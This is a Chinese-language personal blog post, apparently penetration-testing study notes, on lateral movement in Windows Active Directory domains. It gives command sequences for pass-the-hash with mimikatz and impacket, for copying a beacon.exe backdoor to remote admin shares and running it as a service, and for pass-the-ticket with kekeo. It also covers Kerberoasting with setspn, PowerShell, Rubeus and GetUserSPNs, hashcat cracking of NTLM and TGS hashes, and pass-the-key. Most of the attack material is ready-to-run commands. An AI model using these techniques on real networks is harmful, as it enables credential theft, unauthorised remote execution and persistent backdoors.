<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content=""><title>横向移动-2 | Hao's Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=undefined"><link rel="stylesheet" type="text/css" href="https://unpkg.com/normalize.css"><link rel="stylesheet" type="text/css" href="https://unpkg.com/purecss/build/pure-min.css"><link rel="stylesheet" type="text/css" href="https://unpkg.com/purecss/build/grids-responsive-min.css"><link rel="stylesheet" href="https://unpkg.com/font-awesome@4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="https://unpkg.com/jquery/dist/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><script type="text/javascript" src="https://unpkg.com/clipboard/dist/clipboard.min.js"></script><script type="text/javascript" src="https://unpkg.com/toastr/build/toastr.min.js"></script><link rel="stylesheet" href="https://unpkg.com/toastr/build/toastr.min.css"><div class="darkmode-toggle">🌓</div><script>var prefersDarkMode = window.matchMedia('(prefers-color-scheme: dark)');
var toggle = document.querySelector('.darkmode-toggle');
var html = document.querySelector('html');

html.dataset.dark = localStorage.dark || prefersDarkMode.matches;

toggle.addEventListener('click', () => {
localStorage.dark = !(html.dataset.dark == 'true');
html.dataset.dark = localStorage.dark;
});</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">横向移动-2</h1><a id="logo" href="/.">Hao's Blog</a><p class="description"></p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">横向移动-2</h1><div class="post-meta">2025-06-19<span> | </span><span class="category"><a href="/categories/%E5%86%85%E7%BD%91/">内网</a></span></div><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">文章目录</div><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#PTH"><span class="toc-number">1.</span> <span class="toc-text">PTH</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%EF%BC%8C%E5%88%A9%E7%94%A8%E7%9B%B4%E6%8E%A5%E7%9A%84Hash%E4%BC%A0%E9%80%92"><span class="toc-number">1.1.</span> <span class="toc-text">一，利用直接的Hash传递</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1%EF%BC%8CMimikatz"><span class="toc-number">1.1.1.</span> <span class="toc-text">1，Mimikatz</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2%EF%BC%8Cimpacket-at-ps-wemi-smb"><span class="toc-number">1.1.2.</span> <span class="toc-text">2，impacket-at&amp;ps&amp;wemi&amp;smb</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%EF%BC%8C%E5%88%A9%E7%94%A8hash%E8%BD%AC%E6%88%90PTT%E4%BC%A0%E9%80%92"><span class="toc-number">1.2.</span> <span class="toc-text">二，利用hash转成PTT传递</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%EF%BC%8C%E5%88%A9%E7%94%A8hash%E8%BF%9B%E8%A1%8C%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E6%98%8E%E6%96%87"><span class="toc-number">1.3.</span> <span class="toc-text">三，利用hash进行暴力破解明文</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#PTH-1"><span class="toc-number">2.</span> <span class="toc-text">PTH</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1-kekeo-%E9%AB%98%E6%9D%83%E9%99%90%EF%BC%8C%E9%9C%80NTLM"><span class="toc-number">2.1.</span> <span class="toc-text">1.kekeo(高权限，需NTLM)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2-mimikatz-%E9%AB%98%E6%9D%83%E9%99%90%EF%BC%8C%E9%9C%80Ticket"><span class="toc-number">2.2.</span> <span class="toc-text">2.mimikatz(高权限，需Ticket)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3-Kerberoasting"><span class="toc-number">2.3.</span> <span class="toc-text">3.Kerberoasting</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Kerberoasting%E7%9A%84%E5%AE%9E%E7%8E%B0%E6%96%B9%E6%B3%95%E4%B8%80%EF%BC%88%E6%89%8B%E5%8A%A8%E6%A3%80%E6%B5%8B%EF%BC%89"><span class="toc-number">2.3.1.</span> <span class="toc-text">Kerberoasting的实现方法一（手动检测）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Kerberoasting%E7%9A%84%E5%AE%9E%E7%8E%B0%E6%96%B9%E6%B3%95%E4%BA%8C%EF%BC%88%E5%B7%A5%E5%85%B7%EF%BC%89"><span class="toc-number">2.3.2.</span> <span class="toc-text">Kerberoasting的实现方法二（工具）</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#PTK"><span class="toc-number">3.</span> <span class="toc-text">PTK</span></a></li></ol></div></div><div class="post-content"><h1 id="PTH"><a href="#PTH" class="headerlink" title="PTH"></a>PTH</h1><p>pass the hash（哈希传递攻击）<br>pass the ticket （票据传递攻击）<br>pass the key （密钥传递攻击）<br>PTH（pass the hash） # 利用的lm或ntlm的值进行的渗透测试（NTLM认证攻击）<br>PTK（pass the key ） #利用的ekeys aes256进行的渗透测试（NTLM认证攻击）<br>PTT（pass the ticket） #利用的票据凭证TGT进行渗透测试（Kerberos认证攻击）</p>
<p>逻辑思路：<br>明文传递-&gt;PTH(HASH传递)-&gt;PTT(票据攻击)-&gt;PTK(AES)</p>
<p>利用思路：</p>
<h2 id="一，利用直接的Hash传递"><a href="#一，利用直接的Hash传递" class="headerlink" title="一，利用直接的Hash传递"></a>一，利用直接的Hash传递</h2><h3 id="1，Mimikatz"><a href="#1，Mimikatz" class="headerlink" title="1，Mimikatz"></a>1，Mimikatz</h3><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">mimikatz privilege::debug</span><br><span class="line">mimikatz sekurlsa::pth /user:administrator /domain:<span class="number">192.168</span>.<span class="number">3.32</span> /ntlm:<span class="number">518</span>b32ca32c32144ck421aa31c321c</span><br><span class="line"><span class="comment"># 与域控建立IPC</span></span><br><span class="line">net use \\<span class="number">192.168</span>.<span class="number">3.32</span>\c<span class="variable">$</span></span><br><span class="line"><span class="comment">#将后门文件beacon.exe放到目标c盘中</span></span><br><span class="line"><span class="built_in">copy</span> beacon.exe \\<span class="number">192.168</span>.<span class="number">3.32</span>\c<span class="variable">$</span></span><br><span class="line"><span class="comment">#设置定时任务</span></span><br><span class="line"><span class="built_in">sc</span> \\test create bshell binpath=<span class="string">&quot;c:\4.exe&quot;</span></span><br><span class="line"><span class="built_in">sc</span> \\test <span class="built_in">start</span> bshell</span><br></pre></td></tr></table></figure>
<h3 id="2，impacket-at-ps-wemi-smb"><a href="#2，impacket-at-ps-wemi-smb" class="headerlink" title="2，impacket-at&amp;ps&amp;wemi&amp;smb"></a>2，impacket-at&amp;ps&amp;wemi&amp;smb</h3><p>psexec -hashes :NTLM值 域名&#x2F;域用户@域内ip地址<br>smbexec -hashes :NTLM值 域名&#x2F;域用户@域内ip地址<br>wmiexec -hashes :NTLM值 域名&#x2F;域用户@域内ip地址</p>
<h2 id="二，利用hash转成PTT传递"><a href="#二，利用hash转成PTT传递" class="headerlink" title="二，利用hash转成PTT传递"></a>二，利用hash转成PTT传递</h2><p>看下面PPT讲解</p>
<h2 id="三，利用hash进行暴力破解明文"><a href="#三，利用hash进行暴力破解明文" class="headerlink" title="三，利用hash进行暴力破解明文"></a>三，利用hash进行暴力破解明文</h2><p><a target="_blank" rel="noopener" href="https://cmd5.com/">https://cmd5.com/</a><br><a target="_blank" rel="noopener" href="https://hashcat.net/hashcat/">https://hashcat.net/hashcat/</a></p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">hashcat -<span class="selector-tag">a</span> <span class="number">0</span> -m <span class="number">1000</span> <span class="attr">--force</span> <span class="number">518</span>b32ca32c32144ck421aa31c321c pass<span class="selector-class">.txt</span></span><br><span class="line"></span><br><span class="line">-m 密文类型</span><br><span class="line">-<span class="selector-tag">a</span> 破解类型</span><br><span class="line">?l 小写</span><br><span class="line">?s 符号</span><br><span class="line">?d 数字</span><br></pre></td></tr></table></figure>
<p>字典破解</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">hashcat</span> -a <span class="number">0</span> -m <span class="number">1000</span> hash.txt pass.txt</span><br></pre></td></tr></table></figure>
<p>暴力破解</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">hashcat</span> -a <span class="number">3</span> -m <span class="number">1000</span> <span class="number">518</span>b32ca32c32144ck421aa31c321c ?l?l?l?l?l?s?s?s?d?d</span><br></pre></td></tr></table></figure>

<h1 id="PTH-1"><a href="#PTH-1" class="headerlink" title="PTH"></a>PTH</h1><p>pass the ticket （票据传递攻击）</p>
<h2 id="1-kekeo-高权限，需NTLM"><a href="#1-kekeo-高权限，需NTLM" class="headerlink" title="1.kekeo(高权限，需NTLM)"></a>1.kekeo(高权限，需NTLM)</h2><ul>
<li>利用获取的NTML生成新的票据尝试认证</li>
</ul>
<p>因为当前主机肯定之前域其他主机连接过，所以本地应该会生成一些票据，我们导出这些票据，然后再导入票据，利用。该方法类似于cookie欺骗<br>缺点：票据是有有效期的，所以如果当前在连接过域控的话，有效期内可利用<br>生成票据：</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">shell</span><span class="language-bash"> kekeo <span class="string">&quot;tgt:ask /user:Administrator /domain:god.org /ntlm:518b32ca32c32144ck421aa31c321c&quot;</span> <span class="string">&quot;eixt&quot;</span></span></span><br></pre></td></tr></table></figure>
<p>导入票据：</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">shell</span> kekeo <span class="string">&quot;kerberos::ptt TGT_Administrator<span class="variable">@GOD</span>.ORG_krbtgt~god.org<span class="variable">@GOD</span>. ORG.kirbi&quot;</span> <span class="string">&quot;exit&quot;</span></span><br></pre></td></tr></table></figure>
<p>查看票据：</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">shell</span><span class="language-bash"> klist</span></span><br></pre></td></tr></table></figure>
<p>利用票据连接：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">shell <span class="built_in">dir</span> \\主机名\C<span class="variable">$</span></span><br><span class="line">shell net use \\主机名\C<span class="variable">$</span></span><br><span class="line"><span class="built_in">copy</span> beacon.exe \\主机名\C<span class="variable">$</span></span><br><span class="line"><span class="built_in">sc</span> \\主机名 create bindshell binpath=<span class="string">&quot;c:\beacon.exe&quot;</span></span><br><span class="line"><span class="built_in">sc</span> \\主机名 <span class="built_in">start</span> bindshell</span><br></pre></td></tr></table></figure>

<h2 id="2-mimikatz-高权限，需Ticket"><a href="#2-mimikatz-高权限，需Ticket" class="headerlink" title="2.mimikatz(高权限，需Ticket)"></a>2.mimikatz(高权限，需Ticket)</h2><ul>
<li>利用历史遗留的票据重新认证尝试</li>
</ul>
<p>导出票据：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz sekurlsa::tickets /<span class="keyword">export</span></span><br></pre></td></tr></table></figure>
<p>导入票据：</p>
<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimikatz kerberos::ptt [0;22d3a]<span class="string">-2</span><span class="string">-1</span><span class="string">-40</span>e00000-Administrator@krbtgt-god.org.kirbi</span><br></pre></td></tr></table></figure>
<p>查看票据：</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">shell</span><span class="language-bash"> klist</span></span><br></pre></td></tr></table></figure>
<p>利用票据连接：</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">shell</span><span class="language-bash"> <span class="built_in">dir</span> \\主机名\c$</span></span><br></pre></td></tr></table></figure>
<p><strong>注意</strong>：是否成功看当前主机有没有被目标连接过</p>
<h2 id="3-Kerberoasting"><a href="#3-Kerberoasting" class="headerlink" title="3.Kerberoasting"></a>3.Kerberoasting</h2><ul>
<li>利用通讯的加密类型票据进行爆破明文</li>
</ul>
<p>Kerberos攻击条件：<br>采用rc4加密类型票据，攻击Rubeus&amp;Impacket检测或看票据加密类型<br>Kerberoasting攻击利用：<br><a target="_blank" rel="noopener" href="https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Kerberoasting">https://3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-Kerberoasting</a></p>
<ul>
<li>SPN服务发现</li>
<li>请求服务票据</li>
<li>服务票据的导出</li>
<li>服务票据的暴力破解<br><a target="_blank" rel="noopener" href="https://github.com/GhostPack/Rubeus">https://github.com/GhostPack/Rubeus</a><br><a target="_blank" rel="noopener" href="https://github.com/nidem/kerberoast">https://github.com/nidem/kerberoast</a></li>
</ul>
<p>黑客可以使用有效的域用户的身份验证票证（TGT）去请求运行在服务器上的一个或多个<br>目标服务的服务票证。DC在活动目录中查找SPN，并用与SPN关联的服务帐户加密票<br>证，以便服务能验证用户是否可以访问。请求的Kerberos服务票证的密类型是<br>RC4_HMAC_MD5，这意味着服务帐户的NTLM密码哈希用于加密服务票证。黑客将收到的<br>TGS票据离线进行破解，即可得到目标服务帐号的HASH，这个称之为Kerberoast攻<br>击。如果我们有一个为域用户帐户注册的任意SPN，那么该用户帐户的明文密码的NTLM<br>哈希值就将用于创建服务票证。</p>
<p><strong>注意</strong>：是否成功看当前主机票据加密类型<br>SPN:</p>
<p>SPN是服务器上所运行服务的唯一标识，每个使用Kerberos的服务都需要一个SPN<br>SPN分为两种，一种注册在AD上机器帐户(Computers)下，另一种注册在域用户帐户(Users)下<br>当一个服务的权限为<strong>Local System</strong>或<strong>Network Service</strong>，则SPN注册在机器帐户(Computers)下<br>当一个服务的权限为一个域用户，则SPN注册在域用户帐户(Users)下</p>
<p>SPN的格式</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">serviceclass/host:port/servicename</span><br></pre></td></tr></table></figure>
<ul>
<li>serviceclass可以理解为服务的名称，常见的有www, ldap, SMTP, DNS, HOST等</li>
<li>host有两种形式，FQDN和NetBIOS名，例如server01.test.com和server01</li>
<li>如果服务运行在默认端口上，则端口号(port)可以省略</li>
</ul>
<p>查询SPN<br>对域控制器发起LDAP查询，这是正常kerberos票据行为的一部分，因此查询SPN的操作很难被检测<br>(1) 使用SetSPN<br>查看当前域内的所有SPN：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell setspn -q <span class="strong">*/*</span></span><br></pre></td></tr></table></figure>
<p>查看test域内的所有SPN：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell setspn -T test -q <span class="strong">*/*</span></span><br></pre></td></tr></table></figure>
<p>输出示例：</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">CN=DC1,OU=Domain Controllers,DC=test,DC=com</span><br><span class="line">        exchangeRFR/DC1</span><br><span class="line">        exchangeRFR/DC1<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        exchangeMDB/DC1<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        exchangeMDB/DC1</span><br><span class="line">        exchangeAB/DC1</span><br><span class="line">        exchangeAB/DC1<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        SMTP/DC1</span><br><span class="line">        SMTP/DC1<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        SmtpSvc/DC1</span><br><span class="line">        SmtpSvc/DC1<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        ldap/DC1<span class="selector-class">.test</span>.com/ForestDnsZones<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        ldap/DC1<span class="selector-class">.test</span>.com/DomainDnsZones<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        Dfsr-<span class="number">12</span>F9A27C-BF97-<span class="number">4787</span>-<span class="number">9364</span>-D31B6C55EB04/DC1<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        DNS/DC1<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        GC/DC1<span class="selector-class">.test</span>.com/test<span class="selector-class">.com</span></span><br><span class="line">        RestrictedKrbHost/DC1<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        RestrictedKrbHost/DC1</span><br><span class="line">        HOST/DC1/TEST</span><br><span class="line">        HOST/DC1<span class="selector-class">.test</span>.com/TEST</span><br><span class="line">        HOST/DC1</span><br><span class="line">        HOST/DC1<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        HOST/DC1<span class="selector-class">.test</span>.com/test<span class="selector-class">.com</span></span><br><span class="line">        E3514235-<span class="number">4</span>B06-<span class="number">11</span>D1-AB04-<span class="number">00</span>C04FC2DCD2/<span class="number">0</span>f33253b-<span class="number">2314</span>-<span class="number">40</span>f0-b665-f4317b13e6b9/test<span class="selector-class">.com</span></span><br><span class="line">        ldap/DC1/TEST</span><br><span class="line">        ldap/<span class="number">0</span>f33253b-<span class="number">2314</span>-<span class="number">40</span>f0-b665-f4317b13e6b9._msdcs<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        ldap/DC1<span class="selector-class">.test</span>.com/TEST</span><br><span class="line">        ldap/DC1</span><br><span class="line">        ldap/DC1<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        ldap/DC1<span class="selector-class">.test</span>.com/test<span class="selector-class">.com</span></span><br><span class="line">CN=krbtgt,CN=Users,DC=test,DC=com</span><br><span class="line">        kadmin/changepw</span><br><span class="line">CN=COMPUTER01,CN=Computers,DC=test,DC=com</span><br><span class="line">        RestrictedKrbHost/COMPUTER01</span><br><span class="line">        HOST/COMPUTER01</span><br><span class="line">        RestrictedKrbHost/COMPUTER01<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">        HOST/COMPUTER01<span class="selector-class">.test</span><span class="selector-class">.com</span></span><br><span class="line">CN=MSSQL Service Admin,CN=Users,DC=test,DC=com</span><br><span class="line">        MSSQLSvc/DC1<span class="selector-class">.test</span>.com</span><br></pre></td></tr></table></figure>
<p>以CN开头的每一行代表一个帐户，其下的信息是与该帐户相关联的SPN<br>对于上面的输出数据，机器帐户(Computers)为：</p>
<ul>
<li>CN&#x3D;DC1,OU&#x3D;Domain Controllers,DC&#x3D;test,DC&#x3D;com</li>
<li>CN&#x3D;COMPUTER01,CN&#x3D;Computers,DC&#x3D;test,DC&#x3D;com</li>
</ul>
<p>域用户帐户(Users)为：</p>
<ul>
<li>CN&#x3D;krbtgt,CN&#x3D;Users,DC&#x3D;test,DC&#x3D;com</li>
<li>CN&#x3D;MSSQL Service Admin,CN&#x3D;Users,DC&#x3D;test,DC&#x3D;com</li>
</ul>
<p>注册在域用户帐户(Users)下的SPN有两个：<strong>kadmin&#x2F;changepw</strong>和<strong>MSSQLSvc&#x2F;DC1.test.com</strong></p>
<p>域内的任何一台主机，都能够通过查询SPN，向域内的所有服务请求TGS，拿到TGS后对其进行暴力破解</p>
<p>对于破解出的明文口令，只有域用户帐户(Users)的口令存在价值，不必考虑机器帐户的口令(无法用于远程连接)</p>
<p>因此，高效率的利用思路如下：</p>
<p>1,查询SPN，找到有价值的SPN，需要满足以下条件：</p>
<ul>
<li>该SPN注册在域用户帐户(Users)下</li>
<li>域用户账户的权限很高</li>
</ul>
<p>2,请求TGS<br>3,导出TGS<br>4,暴力破解</p>
<h3 id="Kerberoasting的实现方法一（手动检测）"><a href="#Kerberoasting的实现方法一（手动检测）" class="headerlink" title="Kerberoasting的实现方法一（手动检测）"></a>Kerberoasting的实现方法一（手动检测）</h3><p>需要满足以下条件：</p>
<ul>
<li>该SPN注册在域用户帐户(Users)下</li>
<li>域用户账户的权限很高</li>
</ul>
<p>手动原理：<br>先使用spn去获取那些通讯的服务<br>再去连接通讯这个服务，产生票据<br>查看票据的加密通讯类型判断能不能爆破<br>1、使用SetSPN<br>查看当前域内的所有SPN：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">powershell setspn -q <span class="strong">*/*</span></span><br></pre></td></tr></table></figure>

<p>2、请求TGS<br>(1)请求指定TGS</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$SPNName</span> = <span class="string">&#x27;MSSQLSvc/DC1.test.com&#x27;</span></span><br><span class="line">powershell <span class="built_in">Add-Type</span> <span class="literal">-AssemblyNAme</span> System.IdentityModel</span><br><span class="line">powershell <span class="built_in">New-Object</span> System.IdentityModel.Tokens.KerberosRequestorSecurityToken <span class="literal">-ArgumentList</span> <span class="variable">$SPNName</span></span><br><span class="line">或者：</span><br><span class="line">mimikatz kerberos::ask /target:MSSQLSvc/DC1.test.com</span><br></pre></td></tr></table></figure>
<p>(2)请求所有TGS</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Add-Type</span> <span class="literal">-AssemblyName</span> System.IdentityModel  </span><br><span class="line">setspn.exe <span class="literal">-q</span> */* | <span class="built_in">Select-String</span> <span class="string">&#x27;^CN&#x27;</span> <span class="literal">-Context</span> <span class="number">0</span>,<span class="number">1</span> | % &#123; <span class="built_in">New-Object</span> System. IdentityModel.Tokens.KerberosRequestorSecurityToken <span class="literal">-ArgumentList</span> <span class="variable">$_</span>.Context.PostContext[<span class="number">0</span>].Trim() &#125;  </span><br></pre></td></tr></table></figure>
<p>执行后输入klist查看内存中的票据，可找到获得的TGS<br>3、导出<br>使用mimikatz</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">kerberos::list /<span class="keyword">export</span></span><br></pre></td></tr></table></figure>
<p>4、破解<br><a target="_blank" rel="noopener" href="https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py">https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py</a><br>文件票据：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./tgsrepcrack.py pass.txt test.kirbi</span><br></pre></td></tr></table></figure>
<p>HASH密文：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat -m 13100 hash.txt pass.txt --force</span><br></pre></td></tr></table></figure>

<h3 id="Kerberoasting的实现方法二（工具）"><a href="#Kerberoasting的实现方法二（工具）" class="headerlink" title="Kerberoasting的实现方法二（工具）"></a>Kerberoasting的实现方法二（工具）</h3><p>工具：<br>1,impacket-getuserspns<br>请求所有SPN服务器，并找到能破解的票据格式保存到hash.txt</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python GetUserSPNs.py -request -dc-ip <span class="number">192.168</span><span class="number">.3</span><span class="number">.32</span> 域名/账户:密码 -outputfile <span class="built_in">hash</span>.txt</span><br></pre></td></tr></table></figure>
<p>2,Rubeus<br><a target="_blank" rel="noopener" href="https://github.com/GhostPack/Rubeus">https://github.com/GhostPack/Rubeus</a></p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">TGS包直接打印能够使用John或hashcat能够破解的Hash。</span></span><br><span class="line">Rubeus.exe kerberoast /format:john /outfile:kerberoasting.txt</span><br></pre></td></tr></table></figure>

<h1 id="PTK"><a href="#PTK" class="headerlink" title="PTK"></a>PTK</h1><p>pass the key （密钥传递攻击）<br>PTK（pass the key ） #利用的ekeys aes256进行的渗透测试（NTLM认证攻击）<br>当系统安装了KB2871997补丁且禁用了NTLM的时候，那我们抓取到的ntlm hash失去了作用，但是可以通过PTK的攻击方式获取权限</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mimikatz sekurlsa::ekeys</span><br><span class="line">mimikatz sekurlsa:pth /user:域用户名 /doamin:域名 /aes256:aes256值</span><br></pre></td></tr></table></figure></div><div class="tags"><ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/%E5%86%85%E7%BD%91/" rel="tag">内网</a></li></ul></div><div class="post-nav"><a class="pre" href="/2025/06/19/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8-3/">横向移动-3</a><a class="next" href="/2025/06/17/%E4%BA%91%E6%94%BB%E9%98%B2-%E8%87%AA%E5%8A%A8%E5%8C%96%E5%B7%A5%E5%85%B7CDK/">云攻防-自动化工具CDK</a></div></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="search-form"><input id="local-search-input" placeholder="Search" type="text" name="q" results="0"/><div id="local-search-result"></div></div></div><div class="widget"><div class="author-info"><a class="info-avatar" href="/about/" title="关于"><img class="nofancybox" src="/img/avatar.jpg"/></a><p>所幸仍有光.</p><a class="info-icon" href="https://hackerhao.top" title="Email" target="_blank" style="margin-inline:5px"> <i class="fa fa-envelope-square" style="margin-inline:5px"></i></a><a class="info-icon" href="https://github.com/isMyHao" title="Github" target="_blank" style="margin-inline:5px"> <i class="fa fa-github-square" style="margin-inline:5px"></i></a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> 分类</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Java-Web%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E/">Java Web常见漏洞</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">Java基础知识</a><span class="category-list-count">5</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Java%E5%AE%89%E5%85%A8/">Java安全</a><span class="category-list-count">6</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Js%E5%AE%89%E5%85%A8/">Js安全</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">PHP代码审计</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/PHP%E5%AE%89%E5%85%A8/">PHP安全</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/Win%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/">Win权限提升</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" 